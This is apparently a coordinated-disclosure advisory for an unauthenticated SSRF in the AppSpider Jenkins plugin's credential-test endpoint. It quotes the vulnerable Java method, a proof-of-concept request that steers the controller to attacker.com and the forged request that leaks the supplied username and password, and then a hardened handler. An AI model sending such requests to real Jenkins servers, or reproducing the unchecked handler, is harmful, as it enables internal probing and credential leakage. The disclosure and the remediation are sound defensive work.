Coordinated Disclosure Timeline

Summary

A Server-Side Request Forgery (SSRF) vulnerability was found in the appspider-build-scanner-plugin. The vulnerability resides in the com.rapid7.jenkinspider.PostBuildScan#doTestCredentials method and can be exploited without authentication. An attacker can leverage this vulnerability to make the Jenkins controller send requests to arbitrary hosts.

Product

AppSpider Jenkins plugin

Tested Version

1.0.15

Details

SSRF in com.rapid7.jenkinspider.PostBuildScan#doTestCredentials (GHSL-2023-075)

The doTestCredentials method in the PostBuildScan.java file neither validates nor sanitizes the user-supplied appSpiderEntUrl parameter before connecting to it, allowing blind server-side request forgery (SSRF).

Affected source code: PostBuildScan.java

    // appSpiderEntUrl is handed straight to executeRequest: there is no permission check
    // on the caller and no validation of the URL before the connection is made.
    public FormValidation doTestCredentials(@QueryParameter("appSpiderAllowSelfSignedCertificate") final boolean allowSelfSignedCertificate,
                                            @QueryParameter("appSpiderEntUrl") final String appSpiderEntUrl,
                                            @QueryParameter("appSpiderUsername") final String username,
                                            @QueryParameter("appSpiderPassword") final Secret password) {
        return executeRequest(appSpiderEntUrl, allowSelfSignedCertificate, client -> {
            try {
                if (!client.testAuthentication(new AuthenticationModel(username, Secret.toString(password)))) {
                    return FormValidation.error(INVALID_CREDENTIALS);
                } else {
                    return FormValidation.ok("Connected Successfully.");
                }
            } catch (IllegalArgumentException e) {
                return FormValidation.error(INVALID_CREDENTIALS);
            }
        }, FormValidation.error(INVALID_CREDENTIALS));
    }

In order to exploit the vulnerability, an attacker may send the following crafted request:

GET /jenkins/descriptorByName/com.rapid7.jenkinspider.PostBuildScan/testCredentials?appSpiderEntUrl=http:%2f%2fattacker.com%23&appSpiderUsername=foo&appSpiderPassword=bar HTTP/1.1
Host: localhost:8080
Connection: close

The resulting forged request, as received by the attacker-controlled host:

POST / HTTP/1.1
Content-Type: application/json
Content-Length: 31
Host: attacker.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.16.1)
Accept-Encoding: gzip,deflate

{"password":"bar","name":"foo"}

This vulnerability was found using CodeQL’s SSRF Java query.
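A hardened version of the handler, added here as an illustration and not taken from the plugin: it applies the standard Jenkins remediation for form-validation endpoints (a POST-only route plus an ADMINISTER permission check) and rejects URLs with a non-HTTP(S) scheme, missing host, userinfo or fragment, which is the `#` trick used in the proof of concept. It assumes the descriptor still provides executeRequest, AuthenticationModel and INVALID_CREDENTIALS as in the affected source.

```java
import hudson.util.FormValidation;
import hudson.util.Secret;
import jenkins.model.Jenkins;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.verb.POST;

import java.net.URI;
import java.net.URISyntaxException;

// Illustrative hardened handler; executeRequest, AuthenticationModel and
// INVALID_CREDENTIALS are assumed to exist in the enclosing descriptor.
@POST  // Stapler rejects anything but POST, so a crafted GET link no longer reaches this code
public FormValidation doTestCredentials(
        @QueryParameter("appSpiderAllowSelfSignedCertificate") final boolean allowSelfSignedCertificate,
        @QueryParameter("appSpiderEntUrl") final String appSpiderEntUrl,
        @QueryParameter("appSpiderUsername") final String username,
        @QueryParameter("appSpiderPassword") final Secret password) {
    // Only administrators may make the controller connect to a URL they supplied.
    Jenkins.get().checkPermission(Jenkins.ADMINISTER);

    // Parse first: anything java.net.URI cannot parse is refused outright.
    URI target;
    try {
        target = new URI(appSpiderEntUrl);
    } catch (URISyntaxException e) {
        return FormValidation.error("Malformed AppSpider URL.");
    }
    // Require an absolute http(s) URL with a host, and refuse userinfo and fragments.
    // new URI("http://attacker.com#").getFragment() returns "" (non-null), so the
    // proof-of-concept value is rejected here.
    String scheme = target.getScheme();
    if (scheme == null
            || !(scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https"))
            || target.getHost() == null
            || target.getUserInfo() != null
            || target.getFragment() != null) {
        return FormValidation.error("AppSpider URL must be an absolute http(s) URL without credentials or fragment.");
    }

    return executeRequest(appSpiderEntUrl, allowSelfSignedCertificate, client -> {
        try {
            if (!client.testAuthentication(new AuthenticationModel(username, Secret.toString(password)))) {
                return FormValidation.error(INVALID_CREDENTIALS);
            }
            return FormValidation.ok("Connected Successfully.");
        } catch (IllegalArgumentException e) {
            return FormValidation.error(INVALID_CREDENTIALS);
        }
    }, FormValidation.error(INVALID_CREDENTIALS));
}
```

The URL checks limit what an administrator can mistype; the permission check and `@POST` are what close the unauthenticated path described above.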

Impact

This issue may lead to server-side request forgery.

CVE

Resources

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2023-075 in any communication regarding this issue.